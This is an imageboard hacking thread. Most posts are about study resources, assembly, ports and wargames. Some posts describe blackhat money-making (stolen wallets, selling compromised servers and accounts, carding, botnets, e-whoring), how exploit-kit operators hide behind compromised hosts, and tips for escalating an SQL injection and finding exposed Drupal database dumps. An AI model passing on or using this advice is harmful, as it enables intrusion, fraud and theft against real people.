>throw out all your weeb shit
>actually throw out everything you own except your computer and a mattress
>read all the phrack, PHC, ~el8, and anti-sec textfiles
>install a 90s linux server on actual hardware that you get from a dumpster
>write exploits for it

fucking lurk more too



Not our friend '396, but the reason is because it's not necessarily trivial to link a bitcoin wallet with a human. A bitcoin wallet is literally a node in the bitcoin p2p network. If you only connect out to Bitcoin via Tor or another proxy, that's the best means of identifying you gone, so now you have to use other mechanisms like watching the coins like a hawk.

The other thing is, it's not like the DEA has enough resources to track and arrest every online drug dealer even if they wanted to. And they don't really want to - arresting some random MDMA vendor on the internet is not going to make anyone's career, nor are 100 similar arrests. On the other hand, being on the team that brings down a cartel means you get promoted, your group gets more funding, etc.. Remember, state repression is just as gamified as anything else in this century.



File: 1470114393427.webm (3.85 MB, 853x480, 853:480, proto-waifu-is-suffering.webm) ImgOps iqdb


>doing any of that

But why? According to the Gugel overmind all he ever really wanted was to offer his dick to Tomoko!

Fuck all that dumpster noise.

Build a autowaifu, Lain, I know you have it in you!



Not who you're replying to, but I pretty much do already only own a computer and a mattress.

In fact, I don't even own a real mattress. I sleep on a twin sized air mattress in a shithole apartment with shifty immigrants and criminals for neighbors, and my only computers are Linux on "re-appropriated" hardware.

i am supar 1337 h4x0r nao ?



File: 1470121253072.jpg (180.33 KB, 600x450, 4:3, hackerpirate.jpg) ImgOps Exif iqdb

>Wants to be a cyberpunk
Wants to be a genre of fiction
>How do I become 1337 Hax0rz?
>Pirating isn't simple
And you want to hack?
>Tricked by google bot net
Good luck learning to cover your tracks.

Rethink your dream lainon. Cyberpunk is a genre of literature, just ask Gibson. Everyone and their mother wants to be like Neo and hack the Matrix, but many are let down when they realize that hacking, reverse engineering, and cracking aren't like hollywood. For one, problem solving skills an self education are a must. Asking how to hack is a question left for script kiddies at best. You need to have a firm education in hardware, networking, server, cryptography, programming, and mathematics. Come back when you have some of that under your belt and can ask more useful questions. Had you asked something like this anywhere else, you would have been met with silence or laughs. If you want useful answers, ask smart questions. Here's a guide (that guide should be stickied to the top of cyb, tech, and λ):

Also scan the gentoomen library if you need a place to start:



You mean besides your naming scheme, the fact it's an incomplete section of code, the fact you're using a ctrl-a delimiter to clear the screen. The fact that inbound_action(), inbound_privmsg(), and most of the variables you're passing are undefined?

I'm not good enough at security to know what you're trying to do. Looks like you're reading a message form a server. Is this like a command and control thing?



Can someone help me with the concept of network ports? I just don't seem to be getting it right.

Let's say there is host A and servers B and C. If servers B and C send me different information, wouldn't their IP be enough for me to know who is who?

Why do i need server B to send me information through port 90 and server C to send me through port 91? I understand that ports exist to allow you to connect with different applications and services, i just don't see why. From a security perspective it makes sense, since you can block anything that isn't 90 and 91, but that's not the reason ports exist, isn't it? They exist to allow more communication.



>Why do i need server B to send me information through port 90 and server C to send me through port 91?
You don't? Web servers for example typically listen on port 80, and they are contacted by many different clients.



Then what do you need ports for?



So you can run an ssh server and a web server at the same time.



So it works from the server point of view?

I was thinking about it from the host POV, as in "i will be accessing this IP and expecting things from this port".

But it's the other way, "i'll be sending stuff from my IP and you can expect from this port, and if i send something else, i'll send you another port", correct?



Yeah, a client will send a return address and port with it's message to the server. Have a look at the wikipedia page.



Thanks a lot.



How do you fake seeders/leechers on a torrent? Do you need a botnet to do this?



File: 1470190433460.png (73.63 KB, 412x351, 412:351, peepeepoopoo.png) ImgOps iqdb

>get stuck at level 11 in smashthestack
>get stuck at basic level 10 in hackthissite

Should I just learn PHP already?



Keep trying lainon!

I know you can do it :)







I succeeded! Onto realistic missions.



They shouldn't. Bitcoin is not private or untraceable. Coinjoin works i guess but that is built on top. What you want is Monero.



Most of HackThisSite can be done just by reading the forums.



it's easy

>read the bittorrent protocol specification

>probably also read some of cam DHT papers
>use the knowledge you obtain to fake seeders/leechers on a torrent



what means PHP? I want to make my own Chan but I keep seeing that word. Why do you have disdain for it?



PHP is a language. You use it to code websites that need to perform actions on the server. Like storing pictures... managing a database




php is a programming language that is used for websites.

HTML is mark up. You can't do anything programatically with this, but it's of course really useful to make a 'blue print' of what you want to see.

CSS and JavaScript are there to help make the HTML actually look pretty, and create any cool effects you'd like to see on your website.

PHP is what you use when dealing with anything involving security, databases, etc. If you look at the source code of a website, you do not see the php, which is one reason it's so useful. The other reason it's so useful is because it's one of the few things you can use on a website to manage certain tasks that HTML just can't really do.

> Why do you have disdain for it?

There is so much hatred for php because it's just an overall awful language. It's messy, most people just throw stuff together. It's very insecure, and it's a linguistic nightmare. Go look up examples of the code, you'll understand what I mean if you've ever worked with any decent programming languages.



Oh cool, thanks. What languages should I learn in order? It sounds like you need to know a bunch to just do even simple stuff.

I think I'll start with HTML, thanks a lot.



okay so I learned some HTML now I'll soon be on my way to leetness




if you plan on any backend web usage you need to know basic php regardless, your only shooting yourself in the food by delaying the inevitable



Or you could leave the 90s technology behind and use a modern Python or Ruby based framework.



Oh you forgot to mention node.



I didn't forget. Node is cancer.




As is python, ruby, and every other web-dev facing language (yes they can be used for other things).



I haven't studied enough to say anything about these languages, but one of the few things that all sources i'm studying from agree with is that python is a great, robust and secure language. What do you have against it?




It's not the language it's the web-dev community whic his largely why PHP is shit because of shitty culture surrounding development.

I'll give yo uone example. Unless you specifically go out of your way to implement cooperative task programming (coroutines) with gevent, twisted framework, or asyncio libraries, the GIL will impose an upper limit on possible connections you can handle /well/.

Now that's not a limitation of the language itself (since there are ways to accommodate it sanely), but it's definitely not something an off the shelf brogrammer will know how to deal with it. Add redis for message passing? Well how would you expect the same person to know how to allow their application to scale?

I've google dorked a shit ton of flask programmers that left the interactive prompt enabled with their apps since they didn't bother to install a proper WGSI middleware to handle it.

There's nothing particularly "safer" about the language given the ability for programmers to be lazy, or simply out of their depth. That goes for any part of web-dev regardless the language used.



If you plan on attacking a web application you need to know the basics of how the backend is build, regardless of how you feel about them, you don't need to be masters, you don't need to LIKE them. but you need to know the basics so you know how to attack them. how you would do sql injection on a php application is difference from rubyonrails etc.

its mostly because everyone uses a framework, and frameworks / libraries are not build with security in mind, sql should have gone the way of the dinos by now but people still use old out of date libraries, instead of libraries with filtering and sanitation built into the functions and classes.



I'm currently reading ARM Assembly Language by Pete Cockerell. Holy shit, it's an amazing and short book, he explains a lot of complicated concepts in a beautifully simple way.

This book is in the gentooman's torrent file. I haven't finished it, but i highly recommend it, if anyone wants to learn assembly and basic computer architecture. He goes from ground zero and explains everything to you perfectly well.

I tried to read Hacking - The art of exploitation but gave up because they heavily use assembly right at the beginning.

What are you guys studying? Do you recommend any books, courses or videos?



PHP is shit but that's a terrible reason to not learn it. This isn't web development. How many shitty apps do you think are created in PHP? What do you think Wordpress and all of it's plugins are written in?



you won't fully understand hacking the art exploitation on the first go, DONT LET THAT STOP YOU! Most people quit after things get hard, if you don't understand something search it on the internet, look at forums, alot of good places to discuss exploitation!

This is the goto course everyone points to, all open courseware you need to know basic asm (x86)and C, but that shouldn't be hard if what your saying is true,

also cybrary.it has alot of good stuff and opencourseware but my only gripe is that is only really there to get people ready for certs. Not a bad thing.



on top of that the torrent for the CD vm is here http://www.mininova.org/tor/2533556



Oh don't get me wrong, i'm not quitting on the field at all! It's just that right now i'm studying from quite a bit of sources and i'd rather take a week or two to study ASM/C and only then go back to art of exploitation.

Thanks a lot for the resource! I already tried studying from there but right at the first class he mentions a lot of assembly and C, so right now i'm just going back to study C and assembly before going into hack all the things and art of exploitation. Otherwise i'd be stopping every ten minutes to study a related subject since i don't have any experience with C or lower level languages, i've only worked with java in my career.

If you could recommend any material for C i'd gladly take it! Right now i'm just using learn C the hard way ( http://c.learncodethehardway.org/book/ ) and and a few books for assembly + tutorialspoint ( http://www.tutorialspoint.com/assembly_programming/index.htm ).
I should be done with learn C the hard way and ASM this weekend, then i'll try both art of exploitation and hack all things. I'm also watching A+ from cybrary, i'm not taking the certs but i'm feasting on the videos, the material is pretty neat, i'm 42% through the course right now. After that i'll take other courses in network and security.

If there's anything you can recommend me, i'd be really grateful, not only for C but anything that'd be helpful in a security perspective overall.



The book by pete cockerell starts showing its age after the first chapter. He uses ARM architecture, i felt like i was missing out on studying from him if i kept on it. But i still recommend the first chapter of the book for anyone who doesn't have these concepts. He delivers them in a very elegant way.




Well despite agreeing with you mostly, I'll say that I meant to say that even /if/ the module/framework makes great strides towards security. DJango for example (which I personally dislike), has one-size-fits all CSRF protection, XSS detection, and makes it difficult to perform SQL injection aslong as you utilize the provided ORM.

But the point I was making was even in the face of /that/, the implementors of the frameworks towards their end product, will still largely fail by using unsafe defaults (default non-escaped template interpolation); or failing to test for edge cases that can be present in every app. Aswell as not understanding implications of not providing cookies through SSL or using other back end products that break from the security suite provided by the framework. DJango for example won't apply their ORM to Redis, ZeroMQ or other pairings that aren't often seen with DJango in this example.





What you just parse input into a buffer like that?
No checks whatsoever?
Enjoy your remote code exec.



The code doesn't show the buffer being filled which is where problems like that come from (i.e. they didn't check the bounds and filled past the end of buffer). There's another bug in there but without context it's very hard to say how exploitable it is.



This guy gets it. Seems like nobody itt but you can actually hack. And correct, the exploitability isn't sure, but the idea is the same as in Heartbleed.



Are there any good hacker groups out there?
Hackers as in "We spend most of our days studying because we enjoy it" and not "let's go deface a website because it's easy".

Not that i have any qualification for joining, but it'd be good to know that such communities exist online.



>"We spend most of our days studying because we enjoy it"
>"let's go deface a website because it's easy".
It's essentially the same thing. You get real world hacking experience by hacking into real world systems. Jacking off to kevin mitnick and his jewish books won't make you a leet hexer.



If it's easy you're not gaining any knowledge or insight. It's pointless.



Repetitio mater studiorum est



I don't really agree with you that hacking is even about that, but again i might not have as much experience as you do.



>gaining any knowledge or insight. It's pointless.

I'm assuming you don't know what XSS is... Being able to see the various XSS vulnerabilities in websites makes you more able to securely build website code.

As well, it's more fun and intuitive than reading a book. That's probably why he wrote that it's 'easy'

He didn't mean easy he meant fun.



What is hacking about then? Is it about hacking into systems or something else? Curious desu senpai



Changing the intended purpose of a thing (usually software), making things more efficient than people thought they could be, finding vulnerabilities that have not yet been found, making things that shouldn't work, work.



Well yeah, that's the neckberd definition that GNU enforces... Mostly so they could refer to each other as hackers without being grouped in with computer criminals.

The hacking thread you are in now (and hacking as an international scene) are about breaking computer security, it could be via 0days or conventional, well researched ways. It can be about real life systems and networks or CTFs and simulated ones, but the idea is the same.

>finding vulnerabilities that have not yet been found

is hacking, but hacking is not just
>finding vulnerabilities that have not yet been found

'hacking' is the general idea of getting into digital places you aren't supposed to get into.



I see. Either way, there is a clear distinction between groups that only deface a system and groups who are able to get inside a system.

Here in Brazil, for example, there are tons of "hackers" that couldn't create a fizzbuzz if you asked them. They just watch a youtube video about how to deface a wordpress page and then do it and call themselves "anonymous".
That is the distinction i wanted to make between defacers and hackers.



File: 1470403686020.gif (1.27 MB, 154x110, 7:5, Hann_ani.gif) ImgOps iqdb

There are good groups from BR too. I remember SL & EllyEl8 (xero pretending to be little girl or some gay shit like that) hacking into Hann's box a couple of times. It was pretty bueno ownage.

Pic related kek



>Seems like nobody itt but you can actually hack.
Nah. I figure the people who are sure they know the answer do what I did when I first saw it and not say anything because they don't want to ruin it for others.



File: 1470418822840.png (153.31 KB, 410x400, 41:40, world_wide_web.png) ImgOps iqdb



Snowden just tweetet a huge hexa, anyone know what's up?




broken link, anon



File: 1470426374915.png (10.56 KB, 580x84, 145:21, mGEHb0v.png) ImgOps iqdb

He deleted it. Here's a print.



alright, i'll risk the ridicule.

what's the point of publicly posting hashes like this? to encrypt proof of something and post it later? obfuscated communication?



I've no idea.



Known plaintext vulns are old as fuck in the area of crypto. Nothing to see here, people.




to claim authorship of an upcoming leak. Or to demonstrate that you're in posession of something for leverage.

I.e.: You steal a notable hacker's photolibrary and your aim is to blackmail them. You publish the hashes of all the pictures in that library. The hacker then will realize (either through an auxiliary channel or through the same blind post method) that his identity is compromised.

Then you are free to make your demands or make the point known that you have leverage over that individual.

Also, hashes are used often in hashed based content addressing systems like ipfs/dht. So he might be publishing a file that exists on one of those file distribution methods. Or it could be a key hash.

One can also pick which protocol (M.O. specific to opsec or OTP list by selecting the list by nickname + salt). And the salt can be agreed to change with time and our sequence.




The idea of known plaintext attacks are known in /general/, but are highly specific to the protocol. So no there's plenty to see here. Especially if this were to effect Diffie Helman Ephemeral keys.



What are you guys currently studying?



Currently I am studying router firmware that is not traditionally susceptible to WPS pixie attacks and attempt to narrow down places where the generation of entropy is misused. Then make them available to auditing through pixie wps



Trying to find a decent resource to learn MySQL.



Would anyone be interested in a get together, tomorrow?

We could all download a machine from vulnhub and try to attack it, and help each other out on a irc chat.

Would that sound intresting?



Are most people from this board/chan in a specific city? I always see threads about going out together.



No, i mean we would all set it up locally, then we would talk on a irc room!

each person would set up a lab
all agree on a machine to download locally and attack.

we would meet in a IRC room to talk and help each other out!



Oh, i see. I'd love to go but i don't really have the experience for that yet. Good luck though!



That's the thing though! WE would HELP each other! people don't get started or quit half way through, but when they have a mentor or a group to help them they're much more likely to a) finish b) get better faster!



Well, sure, i could get together. I'm still studying assembly and C, i've worked a few years with java but i wouldn't even know how to begin an attack.
If anything i'll just watch.



We will start something easy!
It's not like we are going to just start off with bsd Locked down with ipfw or anything,



Sounds fun.



File: 1470546311289.jpg (748.53 KB, 1536x1152, 4:3, 6c16a50b02dc4272a5130fbc67….jpg) ImgOps Exif iqdb

Around what time are you thinking?



For anyone learning assembly "Programming from the ground up" is a great introduction to computer architecture and assembly.
It assumes you don't even know how to code in any language.



I set up the IRC
default port



forgot to add I will be in pretty much all day!






Why not?



blocks tor



Just use pidgin behind a proxy



>behind a proxy
I've got a list of 50k socks proxies, about 50% done, all blocked so far. This might take a while.



Are you checking both version 4 and 5 of the socks protocol



File: 1470607233289.png (92.67 KB, 1363x213, 1363:213, 2bSNPQ7.png) ImgOps iqdb

The fuck




Yeah, that's not safe or anon. There's plenty of IRCs with tor hidden services. Here's one: https://cyberguerrilla.info/ways-to-connect-to-cyberguerrilla-irc/

>>299 Probably an md5 checksum for a file he sent to someone that he did not want to link directly to the checksum. Once the end user confirmed the complete uncorrupted xfer of the file, they deleted the checksum.



I'm studying like a motherfucker. Networks, security, C++, C, Assembly etc.. I really love this stuff, not only security but the whole low level optimization/elegant software development.

But how can i make money out of that?
I mean sure it's great to be good at something, but i had really serious psycological problems working at a company (fullstack dev) before, and i don't see many remote options in the infosec area.

Any lainons here make money remotely? How do you do it, freelancing? Bug bounties?

Don't seem like i could pay the bills with bug bounties for example. Not consistently at least.



u should just marry me instead



just spam and seo for ad revenue. you can make a lot of money, if you are good at what you do



That isn't websec, my question is how to make money in a websec position. I could just freelance as a webdesigner to make a few bucks to buy food, it's what i do right now, but i don't wanna do that stuff for long.




how would one do that?




Seems like a good course. You learn how to create a SO from scratch, it's free, just go to "preview course"



e-whoring is pretty good, ask for money from desperate people, if you don't mind hurting peoples feeling you can get alot and most police agencies would laugh if they tried to report you



pastebin of resources from /r/how_to_hack



Not only is that really fucked up, i can't see how that can be related to hacking in any way.



Hey, thanks. There's a lot of good material in there. There's a magnetic link for a shit ton of books from IT books, now that it's dead, it'd be good if people seeded it.




Holy shit it books is back, just checked it.




Holy shit dude. Thank you for this link. Is there a way to download all of the books, or are we talking hundreds of books in this site?

Do you have any recommendations to download? Other than me downloading some more books on other languages.

Another thing - are there any other forums/boards/IRC that you guys frequent, that seem to be somewhat active? I've tried several different channels but with no real luck. I've also tried the Defcon groups, but a lot of the cities surrounding me are deader than a doornail.



I just posted a magnetic link for 1800 books from it books, i'm pretty sure it's not all of them, but it's a huge chunk.

And the recommendations depends on what you wanna do really, i'd recommend downloading /g/entooman's library if you want a collection. If you're into hacking, you should learn assembly, c and c++, then network.

A good starting point is the book "Programming from the ground up" for assembly, "The C programming language, 2nd edition" for C, and "The C++ programming language, 4th edition" for c++. While you read those books you can watch cybrary's A+ course.

After that you should have a better understanding of the field and an idea of where to go.

I'm not a part of any irc channel, can't help with that.



Making money the blackhat way isn't just one thing, because you never know what you can find on servers. Not all of them have a ready btc wallet you can steal, instead you have to think outside of the box a little. You can sell the roots, or sell the box as-is to drive-by exploit hosters. Grabbing the accounts, testing for password reuse in other services and selling the accounts for example netflix work too.



But this thread isn't about that, dude. If you have to do stuff that isn't related to the point of this thread, then it's not really relevant isn't it?

Hacking mentality can be applied to even sex, but we shouldn't be talking about sex here.



>But this thread isn't about that, dude.
Oh, I thought this was a
>Hacking General

If you wanna follow your passion on the whitehat path, you can do what thousands of others are doing right now. Get a small crew together with various skills start your own firm and wait for pentesting offers.

Then starve to death because nobody will hire you over the 100 already established, well known firms.



I apologize, i thought you were the one talking about "manipulating people to get money" in the most generic possible way.

I'm not looking for anything blackhack though, i'm asking how i can make reliable money, stealing is hardly reliable to pay montly bills and buy food.



The whitehat side of things is pretty dry of money atm, unless you are going to do bug bounties. They are not really what you'd call a reliable source of income either.

You can make reliable bucks via blackhat methods, mostly by things related to CCs and money transfers, but you need reliable contacts and a lot of hard work to actually build and manage your botnet empire.

If you want to ditch the "security" aspect and focus on "anything computer related" though, you can find lots of gigs doing freelance programming. The gigs might not be that interesting, as they are usually about "write this specific part of the program/library", but they can keep you fed.

I do ad stuff, PTC and CPA things, they can get you decent cash, but they need to be handled like a full time job instead of a neat little side project.



Yeah, right now i'm freelancing for whatever people pay me to do (make a page out of a CVS file, setup or fix a wordpress page, etc..). But this kind of work is really draining me, i don't like front end and it's a horrible chore.

Security doesn't seem to be viable as a profession for a remote worker though, so i might try to land a remote software engineer job, while it's not ideal, it's better than what i do right now. Thanks for your info though.



>Then starve to death because nobody will hire you over the 100 already established, well known firms.
Then you ought to make a name for yourself and your firm , if you dig what I mean
*wink* *wink* *nudge* *nudge*



File: 1470944744351.png (46.77 KB, 150x150, 1:1, 1470599731730.png) ImgOps iqdb

I'm learning assembly right now and i feel dumb as fuck. I'm not asking for more resources, i have plenty, i'm just frustated i guess.

I was keeping up with the book i'm reading (programming from the ground up with assembly x86), but when i reached functions holy shit i'm lost as fuck.

Sure if i read the code line by line i'll be able to understand what i does, but in no way would i be able to create a simple function in assembly. What the fuck man..



if you've been keeping up you shouldn't have an issue with functions.



He's using a C standard for stack calling, it's not just the random declaration of a function. It's getting clearer now, but just the fact that it took me a whole day to get it right is pretty disappointing.



Hey, can someone clarify something for me regarding x86 assembly programming?

If i do pushl %ebp, the contents of %ebp will be both at the %ebp register and at the top of the stack in memory, correct? And if i override %ebp i just have to refer to %esp whenever i wish to retrieve the previous value of %ebp, correct? Of course i can override %esp too, but what i'm trying to get to is that the same information will be at different parts of the computer at once (a memory location and a register). Is that assumption correct?

Also, the stack is a place in memory where i keep temporary information about a function, right? It's a place in memory just like a variable, except it follows different rules and has a different purpose, but essentially it's a place where i will put (specific) stuff, and then retrieve it, except that the system expects me to follow certain rules otherwise it won't be able to work(go back to who called a specific stack frame), correct?



>the same information will be at different parts of the computer at once (a memory location and a register). Is that assumption correct?
yes, push is like a mov, except it also moves the stack pointer to point to the value most recently pushed

>Also, the stack is a place in memory where i keep temporary information about a function, right?

the stack is where you keep variables
if you want dynamic memory allocation use a heap manager.
you're wrong in thinking that there are any rules imposed by the architecture itself.
the operating system might however prevent you from accessing memory in certain pages for example, for security reasons.



>you're wrong in thinking that there are any rules imposed by the architecture itself.
Not directly, but if i don't have the return value of my stack frame, i won't be able to go back to whatever function called me right? It's not a physical rule, but i have to "agree with it", don't i?
Thanks a lot for the info, it helped a lot.



if you use call to call a function, the return address will be automatically added to the top of the stack.
you can return to that address with ret at any point as long as the pointer is at the top of the stack
but yeah, like if you shrink the stack or overwrite that value you'll probably be in trouble





First time posting, hopefully this is the first time this is posted here, here are a bunch of e-books :)




File: 1471095511515.png (85.31 KB, 1593x360, 177:40, B9MG8ac.png) ImgOps iqdb

Is "The C programming language" really this poorly written, or did i download an unrevised version? I've seen some pretty sloppy code examples too, with poorly named variables that don't do anything, a bunch of expressions in a single line, etc..



It's just another form of spam and spread virus,



Fowking hell m8, since when did drupal update their password hashing policy? I'm getting 1639 H/s on a single hash.

Kill me now desu senpai.



File: 1471119379366.png (173.13 KB, 500x548, 125:137, anime-beautiful-cute-girl-….png) ImgOps iqdb

So I just started some of Cybrary's classes, and as a fledgling programmer that's self-taught I know I got some holes in my knowledge. Information security is something I have become actively interested in, so I started shit from the ground up.

I'm starting with CompTIA A+ and I am noticing the lectures are really, really short. I'm assuming that Cybrary's resources are more overviews (as well as some of these classes) for more thorough resources?

Reason I ask this is that when I compared Cybrary's course to CompTIA versus the actual book (~1200 pages) and people telling me they studied for months, I am feeling it can't possibly that easy to pass. Unless I'm just realizing I know a lot it's already talking about?

Anyway, just looking to actually learn, but be proficient with my knowledge, than base overviews. Any suggestions would be aaaaaaace.



ComptiA has 43 hours of material. You can read 1200 pages in far less than 43 hours.

I watched all comptiA classes, but i've never had any interest in certifications (since i don't have the cash for that). There was some bullshit, but overall the first half of the classes were great.

I wouldn't recommend you to study just from there though, try to study 2, 3 or as many subjects as you can at the same time, otherwise you will likely be bored or frustated when you hit a tough/uninteresting subject.

Good luck.



A+ is trivially easy. This will not be like anything you learned at school. A+ is mostly about memorizing details, only in the networking portions does it become in anyway theoretical. The reason why the lectures are so short is because, in addition to the simplicity of A+, the course is meant to be supplemented with your own study. This may include going over recommended reading material, finding a checklist of exam topics and if you're cheeky, going over brain-dumps.

Personally, unless you actually want the cert for employment or extra credits in a course (and there is nothing wrong with that). You may just want to do the cybrary side of things because A+ is quite mind numbing and will set you back nearly $200 for the actual exam.

I recently took the CCNA course at cybrary, and I am still studying but, cybrary was a great starting point. From memory the course materials tab will have a bunch of text books which you may wish to "acquire" should you want to attempt the exam. >>360



Is this thread in autosage?



It is. What's up with that?



At what point do you guys join wargames and puzzles? I've been studying C,C++ and assembly for a while and i've worked for over a year with front end dev.
I tried doing hackthissite's first tutorial, it only asks you to know HTML, yet i have no idea how to bypass it. 0 clue.
I'm not asking for answers, as that would defeat the whole purpose of a puzzle, but what should i study? Are there any books, courses or introductions you guys have done previously that helped you crack these challenges?



We had setup a IRC channel, rizon #lainhackgen
That being said, hackthissite challenges answers and clues are in the forums and are probably much better

That being said, we setup the #lainhackgen was to work together to break into machines and help eachother get better but hasn't really caught on

(also sleepz if your lurking, i beat that vm, thanks for the hand!)



>At what point do you guys join wargames and puzzles?
ASAP, they're wargames for everyone, and you will never know every little thing, and the best way to learn is in a wargame that way you can apply it!
> Are there any books, courses or introductions you guys have done previously that helped you crack these challenges?
I do enumeration and see what exploit / vulns / etc. Are out there to test out.

The most important advice is DONT GIVE UP.



I'm not giving up, but i just found out MIT'S free course on computer science. I'll be doing that alongside cybrary, i always wanted to have a proper, solid foundation on programming and computer science.
I study a lot so it shouldn't take more than a month or two for me to finish the whole course. Thanks a lot for your help by the way.



By the way, their course is insanely great. They teach eletronic engineering plus computer science. All the material and exercises are provided for you.





>>109 (OP)
what are some useful methods of obscuring your location? use a box you've already compromised? pay for a vpn (seems untrustworthy)? utilize tor and friends?



>use a box you've already compromised? pay for a vpn (seems untrustworthy)? utilize tor and friends?
These are all good things
If you use a vpn make sure x doesn't have access to it, Not that i would know or anything.



Well, I will share how exploit kits like angler are usually employed.

Typically the EK will be served/controlled from a compromised wordpress, hopefully in a legally difficult country. The real command and control will come via tor communications with this compromised site.

Sometimes people develop very long chains of proxies, and vary up the exact chain on a week to week basis, just to evade analysis.

Keep in mind, somehow someone has to make a direct attack on the original server, as serving many exploits over tor is a huge pain in the ass. Not saying people don't do it, but it's a huge pain in the ass and easy to fuck up.

Criminal groups (like those running angler) get away with the initial break in by having already established groups of compromised computers in legally obscure zones, where getting forensics teams in is a no go.

Also, I might add that any server that has an easy to use wordpress exploit is almost guaranteed to be infected with this sort of shit. There are bots that scan the entire ip4 range just looking for shitty wordpress installs.

I have rambled too long.



How would you go about dumping the users of a mysql server?

I found an injection point but I lack the privileges to access the user table.

How is this normally done? Should I look for exploits for that specific mysql version or can it be done with injections alone?



Hi lainons, I'm want to buy a tp-link tl-wn722n for pentesting wireless routers.
I want to know your opinion ( it supports packet injection and monitor mode, so the aircrack-ng suite will work )



I have one. It's good, but only does 150MBs. The ath9k driver is real easy to work with, should work fine for wifi pen testing.



If you can't learn it on the spot as you're doing it you're not a real hacker.




what privs do you have? check for outfile and others to see ifyou have write/read access. Pull in source files ifyou can to see hard coded passwords, or write to disk and overwrite the admin page.



Since version 8. Protip, the migration tool for drupal from 7 -> 8 is often misconfigured. The .sql files are written (often) written to a traversable directory. Look into google dorking or directory fuzzing.

Delete Post [ ]
[ [̲̅$̲̅(̲̅ιοο̲̅)̲̅$̲̅] / rules ] [ mega / sec / tech / λ / diy / layer ] [ zzz / feels / drg / lit / cult / civ ] [ q / random ] [ / / V ] [ volafile / LainTV ]